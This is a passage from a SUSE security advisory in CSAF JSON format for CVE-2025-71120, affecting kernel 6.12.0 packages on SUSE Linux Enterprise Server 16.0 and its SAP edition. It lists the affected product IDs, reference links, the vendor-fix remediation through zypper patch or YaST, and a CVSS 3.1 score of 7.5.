"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71120",
"url": "https://www.suse.com/security/cve/CVE-2025-71120"
},
{
"category": "external",
"summary": "SUSE Bug 1256779 for CVE-2025-71120",
"url": "https://bugzilla.suse.com/1256779"
},
{
"category": "external",
"summary": "SUSE Bug 1256780 for CVE-2025-71120",
"url": "https://bugzilla.suse.com/1256780"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
